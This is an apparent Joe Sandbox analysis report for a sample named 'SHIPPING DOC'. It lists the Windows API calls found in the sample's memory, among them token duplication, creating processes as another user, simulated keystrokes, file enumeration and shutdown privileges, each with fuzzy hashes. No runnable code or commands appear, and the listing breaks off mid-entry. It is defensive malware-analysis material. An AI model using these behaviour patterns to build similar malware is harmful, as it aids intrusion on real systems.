                                                                                                                      • ImageList_BeginDrag.COMCTL32(00A2E5A0,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                                                                      • SetCapture.USER32(?), ref: 0047CBB6
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                                                                      • ReleaseCapture.USER32 ref: 0047CC3A
                                                                                                                      • GetCursorPos.USER32(?), ref: 0047CC72
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                                                                      • SendMessageW.USER32 ref: 0047CD12
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                                                                      • SendMessageW.USER32 ref: 0047CD80
                                                                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                                                                      • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                                                                      • GetParent.USER32(00000000), ref: 0047CDF7
                                                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                                                                      • SendMessageW.USER32 ref: 0047CE93
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,02E91AD0,00000000,?,?,?,?), ref: 0047CF1C
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                                                                      • SendMessageW.USER32 ref: 0047CF6B
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,02E91AD0,00000000,?,?,?,?), ref: 0047CFE6
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                      • String ID: @GUI_DRAGID$F
                                                                                                                      • API String ID: 3100379633-4164748364
                                                                                                                      • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                                      • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                                                                      • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                                      • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32 ref: 00434420
                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                                                                      • IsIconic.USER32(?), ref: 0043444F
                                                                                                                      • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                                                                      • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                                                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                                                                      • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                      • API String ID: 2889586943-2988720461
                                                                                                                      • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                                      • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                                                                      • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                                      • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                                                                      APIs
                                                                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                                                                      • GetProcessWindowStation.USER32 ref: 004463D1
                                                                                                                      • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                                                                      • _wcslen.LIBCMT ref: 00446498
                                                                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                      • _wcsncpy.LIBCMT ref: 004464C0
                                                                                                                      • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                                                                      • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                                                                      • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                                                                      • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                                                                      • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                                                                      • CloseDesktop.USER32(?), ref: 0044657A
                                                                                                                      • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00446592
                                                                                                                      • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                                                                      • String ID: $@OH$default$winsta0
                                                                                                                      • API String ID: 3324942560-3791954436
                                                                                                                      • Opcode ID: 17ea6258488d9c46c7a00dd8b46b11f65bca9c9d467b249e48c4e72528dedec9
                                                                                                                      • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                                                                      • Opcode Fuzzy Hash: 17ea6258488d9c46c7a00dd8b46b11f65bca9c9d467b249e48c4e72528dedec9
                                                                                                                      • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00478924
                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                                                                      • __swprintf.LIBCMT ref: 004789D3
                                                                                                                      • __swprintf.LIBCMT ref: 00478A1D
                                                                                                                      • __swprintf.LIBCMT ref: 00478A4B
                                                                                                                      • __swprintf.LIBCMT ref: 00478A79
                                                                                                                        • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                                                                        • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                                                                      • __swprintf.LIBCMT ref: 00478AA7
                                                                                                                      • __swprintf.LIBCMT ref: 00478AD5
                                                                                                                      • __swprintf.LIBCMT ref: 00478B03
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                                                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                      • API String ID: 999945258-2428617273
                                                                                                                      • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                                      • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                                                                      • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                                      • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                                      • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                                      • __wsplitpath.LIBCMT ref: 00403492
                                                                                                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                      • _wcscpy.LIBCMT ref: 004034A7
                                                                                                                      • _wcscat.LIBCMT ref: 004034BC
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                        • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                                                                        • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                                                                      • _wcscpy.LIBCMT ref: 004035A0
                                                                                                                      • _wcslen.LIBCMT ref: 00403623
                                                                                                                      • _wcslen.LIBCMT ref: 0040367D
                                                                                                                      Strings
                                                                                                                      • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                                                                      • Error opening the file, xrefs: 00428231
                                                                                                                      • _, xrefs: 0040371C
                                                                                                                      • Unterminated string, xrefs: 00428348
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                                                      • API String ID: 3393021363-188983378
                                                                                                                      • Opcode ID: d7567003ac82893a05918a50732f98c0da489d2a1a1b1371126f827adaf0f001
                                                                                                                      • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                                                                      • Opcode Fuzzy Hash: d7567003ac82893a05918a50732f98c0da489d2a1a1b1371126f827adaf0f001
                                                                                                                      • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 1409584000-438819550
                                                                                                                      • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                                      • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                                                                      • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                                      • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                                                                      APIs
                                                                                                                      • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                                                                      • __swprintf.LIBCMT ref: 00431C2E
                                                                                                                      • _wcslen.LIBCMT ref: 00431C3A
                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                                                                                      • String ID: :$\$\??\%s
                                                                                                                      • API String ID: 2192556992-3457252023
                                                                                                                      • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                                      • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                                                                      • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                                      • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                                                                      APIs
                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                                                                      • __swprintf.LIBCMT ref: 004722B9
                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath$LocalTime__swprintf
                                                                                                                      • String ID: %.3d
                                                                                                                      • API String ID: 3337348382-986655627
                                                                                                                      • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                                                      • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                                                                      • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                                                      • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00442930
                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                                                                        • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 2640511053-438819550
                                                                                                                      • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                                      • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                                                                                      • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                                      • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                                                                      • GetLastError.KERNEL32 ref: 00433414
                                                                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                                                                      • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                                                                      • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
